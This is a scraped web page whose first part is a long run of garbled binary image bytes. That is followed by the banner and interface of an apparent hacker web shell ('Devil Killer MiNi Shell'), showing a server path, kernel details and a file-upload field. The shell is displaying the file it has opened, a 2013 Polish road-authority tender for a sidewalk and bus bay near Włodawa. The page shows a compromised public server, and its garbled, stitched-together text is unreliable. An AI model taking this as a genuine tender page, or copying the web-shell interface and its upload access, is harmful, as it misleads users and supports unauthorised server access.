JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130531/95469-N-2013.html

<p class="kh_header"><b>Włodawa: Budowa chodnika wraz ze zjazdami, rowem krytym i zatoką autobusową 
w m. Wyryki Adampol w ciągu drogi wojewódzkiej Nr 818 Przewłoka - Wyryki - Adampol</b><br>
<b>Numer ogłoszenia: 95469 - 2013; data zamieszczenia: 31.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wwwe.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodnika wraz ze zjazdami, rowem krytym i zatoką autobusową 
w m. Wyryki Adampol w ciągu drogi wojewódzkiej Nr 818 Przewłoka - Wyryki - Adampol.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane polegające na:

 Budowa chodnika wraz ze zjazdami, rowem krytym i zatoką autobusową 
w m. Wyryki Adampol w ciągu drogi wojewódzkiej Nr 818 Przewłoka - Wyryki - Adampol 
zgodnie z projektem budowlano-wykonawczym , przedmiarami robót oraz ze szczegółowymi specyfikacjami technicznymi (SST) stanowiącymi załącznik do umowy.
2. Zakres robót obejmuje:
 2.1. Budowa przepustu rurowego d=400 pod chodnikiem.
2.1.1.	roboty ziemne:
	- wykopy,
	- podłoża pod kanały - podsypka piaskowa,
	- zasypanie wykopów z zagęszczeniem,
2.1.2.  roboty montażowe:
	- kanał z rur polietylenowych typu WEHOLITE-SPIRO o średnicy 400 mm,
	- studzienki rewizyjne
	- próba szczelności.

2.2. Regulacja oraz zabezpieczenie urządzeń telekomunikacyjnych.

2.3. Budowa chodnika,  zatoki autobusowej i zjazdów.
2.3.1.  roboty przygotowawcze:	
    	- roboty pomiarowe,
	- usunięcie humusu
   	- rozebranie przepustów rurowych, 
2.3.2.  roboty ziemne:
	- wykonanie wykopów,
	- wykonanie nasypów,
2.3.3. budowa chodnika:
	- profilowanie i zagęszczenie podłoża, pod warstwy konstrukcyjne nawierzchni,
    	- podbudowa z gruntocementu,
    	- nawierzchnia z betonowej kostki brukowej gr. 6 cm,
2.3.4. zjazdy indywidualne:
    	- profilowanie i zagęszczenie podłoża, pod warstwy konstrukcyjne nawierzchni,
    	- podbudowa z gruntocementu,
	- podbudowa z kruszywa łamanego,
    	- nawierzchnia z betonowej kostki brukowej gr. 8 cm,
2.3.5. zjazdy publiczne:
    	- profilowanie i zagęszczenie podłoża, pod warstwy konstrukcyjne nawierzchni,
    	- podbudowa z gruntocementu,
	- podbudowa z kruszywa łamanego,
    	- nawierzchnia z betonowej kostki brukowej gr. 8 cm,
2.3.6 zatoka autobusowa:
	- profilowanie i zagęszczenie podłoża, pod warstwy konstrukcyjne nawierzchni,
    	- podbudowa z gruntocementu,
	- podbudowa z kruszywa łamanego,
	- podbudowa z chudego betonu,
    	- nawierzchnia z betonowej kostki brukowej gr. 8 cm,
 2.3.7. pobocza:
	- umocnienie pobocza kruszywem łamanym,
2.3.8. elementy ulic:
	- krawężniki betonowe 15x30 układane na płask
	- krawężniki betonowe 20x30 na ławie betonowej z oporem,
	- krawężniki betonowe obniżone 15x30 bez ław,
	- obrzeża betonowe 20x6 na podsypce piaskowej,
2.3.9. oznakowanie pionowe
2.3.10. oznakowanie poziome
2.3.11. roboty wykończeniowe:
	- plantowanie i obrobienie na czysto skarp i korony nasypów:
	- humusowanie trawników z obsianiem trawą, 
	- inwentaryzacja geodezyjna powykonawcza.
3. Szczegółowy zakres określa kosztorys ofertowy i przedmiar robót stanowiące załączniki do SIWZ.
4. Roboty należy wykonać zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót:
    D-00.00.00. Wymagania ogólne,
	D-01.01.01. Odtworzenie trasy i punktów wysokościowych,
	D-01.02.02. Zdjęcie warstwy humusu,
	D-01.02.04. Rozbiórka elementów dróg, 
	D-02.00.01. Roboty ziemne. Wymagania ogólne
	D-02.01.01. Wykonanie wykopów,
	D-02.03.01. Wykonanie nasypów,
D-04.01.01. Koryto wraz z profilowaniem i zagęszczeniem podłoża,
    D-04.04.02. Podbudowa z kruszywa łamanego stabilizowanego mechanicznie,
    D-04.05.01. Ulepszone podłoże z gruntu stabilizowanego cementem w betoniarce,
D-04.06.01. Podbudowa z chudego betonu
D-05.03.23a. Nawierzchnia z betonowej kostki dla chodnika, zjazdów i miejsc postojowych,
D-06.01.01.Umocnienie powierzchni skarp rowów,
D-06.02.01. Przepusty pod zjazdami,
D-07.01.01. Oznakowanie poziome,
D-07.02.01. Oznakowanie pionowe,
D-08.01.01b. Krawężniki betonowe,
D-08.03.01. Obrzeża betonowe chodnikowe,
D-10.06.01. Zatoki autobusowe,
D-10.07.01. Zjazdy na posesje i zjazdy publiczne.
5. Na wbudowane materiały Wykonawca winien przedłożyć aprobaty techniczne i świadectwa
    jakości.
6. Wykonawca przed przystąpieniem do wykonywania robót budowlanych zobowiązany jest do  opracowania i przedstawienia Zamawiającemu planu BIOZ zgodnie z art. 21a ustawy z dnia 07 lipca 1994 r. Prawo budowlane wraz z późniejszymi zmianami.
7. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego, kołowego i pieszego, w rejonie prowadzonych robót objętych umową, na podstawie, dostarczonego przez Zamawiającego, sporządzonego zgodnie z obowiązującymi przepisami, projektu organizacji ruchu ( na czas prowadzonych robót ) zatwierdzonego przez Zarządzającego ruchem na drogach wojewódzkich tj. Dyrektora ZDW w Lublinie.    
7. Okres rękojmi dla robót objętych zamówieniem wynosi 3 lata od daty odbioru  ostatecznego.
8. Wykonawca zobowiązany jest do zawarcia na własny koszt odpowiednich umów ubezpieczenia 
    z tytułu odpowiedzialności cywilnej na czas realizacji zamówienia.
9. Ubezpieczeniu podlega odpowiedzialność cywilna kontraktowa oraz deliktowa za szkody oraz następstwa nieszczęśliwych wypadków dotyczące pracowników i osób trzecich, powstałe w związku z prowadzonymi pracami, w tym także ruchem [pojazdów mechanicznych - wymagana suma ubezpieczenia nie mniej niż 50 tys. zł. na jedno zdarzenie.
10. Kopie polis lub dokumentów ubezpieczeniowych potwierdzone za zgodność z oryginałem Wykonawca przedłoży do wglądu Zamawiającemu najpóźniej w dniu przekazania miejsca wykonania zamówienia i następnie na każde żądanie Zamawiającego. Opóźnienie z tego tytułu będzie traktowane jako powstałe z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia zamówienia.
11. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. 
12. Zgodnie  z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne  
    opisywanym przez  Zamawiającego jest obowiązany wykazać, że oferowane roboty   
    budowlane spełniają  wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy)
    Za rozwiązania równoważne uznana będzie oferta na wykonanie remontu przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w Szczegółowych Specyfikacjach Technicznych, pod warunkiem, że ich parametry będą nie gorsze niż określone w SST. 
Szacunkowa wartość zamówienia netto: 534068,29 PLN.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.31.42-6, 45.11.12.00-0, 45.23.33.20-8, 45.23.30.00-9, 45.11.27.30-1, 45.23.32.21-4, 45.23.32.90-8, 45.23.31.00-0, 45.23.32.00-1, 45.11.21.00-6, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości :
    10 000,00 zł. ( dziesięć tysięcy złotych 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo 
    zamówień publicznych.
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy 
    w  Kredyt Banku S.A. O/Lublin Nr 89 1500 1520- 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie
          Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia 
          warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków 
          o których mowa w art. 22 ust.1. ustawy Pzp, 
Ocena spełniania warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków posiadania wiedzy i doświadczenia 
Wykonawca winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum jednej roboty budowlanej odpowiadającej rodzajem i zakresem robotom budowlanym stanowiącym przedmiot zamówienia. 
Ocena spełniania warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem 
technicznym niezbędnym do wykonania zamówienia Wykonawca winien dysponować wymienionymi poniżej jednostkami sprzętu i środkami transportu:
          a) koparka podsiębierna				- 1 szt. 
          b) spycharka				    		- 1 szt.
          c) ładowarka						- 1 szt.
          d) samochód samowyładowczy			- 1 szt.
          e) wibrator płytowy z osłoną z tworzywa		- 1 szt.
Ocena spełniania warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania
          zamówienia Wykonawca winien dysponować minimum jedną osobą, która będzie 
          uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane branży
          drogowej uprawniające do pełnienia funkcji kierownika budowy.
Ocena spełniania warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie
          Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia 
          warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków 
          o których mowa w art. 22 ust.1. ustawy Pzp, 
Ocena spełniania warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów jakie należy dostarczyć w celu potwierdzenia 
    spełniania warunków udziału w postępowaniu, Wykonawca obowiązany jest dołączyć do oferty:
1)  Dowód wniesienia wadium ( w przypadku wniesienia wadium w formie innej niż pieniądz 
         dokument powinien być złożony w formie oryginału).
2)  Formularz ofertowy (z ceną brutto, netto, podatkiem VAT), 
         wraz z kosztorysem ofertowymi.     3)  Zaakceptowany wzór umowy  i warunków do umowy 
 4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
          do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
          pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
          albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
          publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
5) Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcy - jeżeli Wykonawca nie zamierza powierzać części zamówienia podwykonawcom wpisuje NIE DOTYCZY      6) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
          nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument
          potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje
    możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty
    polegających na:
1)	zmianie wynagrodzenia w przypadku gdy zmianie ulegnie stawka podatku VAT.
2)	zmianie terminu wykonania umowy w przypadku:
     -  wystąpienia niekorzystnych warunków atmosferycznych (obfite opady deszczu uniemożliwiające wykonanie robót i  odbiorów zgodnie z SST) Termin wydłużony zostanie o liczbę dni w których niemożliwe było wykonywanie robót. Podstawę stanowić będzie protokół sporządzony przez Inspektora nadzoru, podpisany przez obie strony.
     - wystąpienia siły wyższej, której strony nie mogły przewidzieć, której nie mogły zapobiec ani której nie mogą przeciwdziałać, a która uniemożliwia Wykonawcy wykonanie w całości lub części jego zobowiązań. W tym przypadku Wykonawcy 
     przysługuje wynagrodzenie za faktycznie wykonany zakres umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wwqw.zdw.lublin.pl/news.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie ul. Lubelska 60, pokój nr 11 w godz. 07:00 - 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2013 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie ul. Lubelska 60  w pokoju nr 5 /sekretariat / .
Otwarcie ofert w dniu 17/06/2013 r. pokój Nr 6, godz. 09:10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują: za pomocą faksu nr (82) 572-17-93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl
         Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną , każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
        Osoby uprawnione do porozumiewania się z Wykonawcami.
               1.   W sprawach technicznych - Krystyna Kowalewska   tel. (82) 572 19 52
            2. W sprawach   formalno-prawnych   związanych   z   postępowaniem 
             o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk, 
             Eugeniusz  Kiewczykowski  tel. (82) 572 16 35
Uwaga:
Wykonawcy, którzy uzyskają  niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faxem nr (82) 572-17-93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl zawierające podstawowe dane firmy ( nazwa, adres, numer tel. i faksu, adres poczty elektronicznej).Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, przedłużeniu terminu składania ofert.  
Pouczenie o środkach ochrony prawnej przysługujących wykonawcy 
w toku postępowania o udzielenie zamówienia.

1. Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności 
    zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
    czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2. Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
    (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
3. Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
    której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
    zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
    uzasadniające wniesienie odwołania. 
4. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
    bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
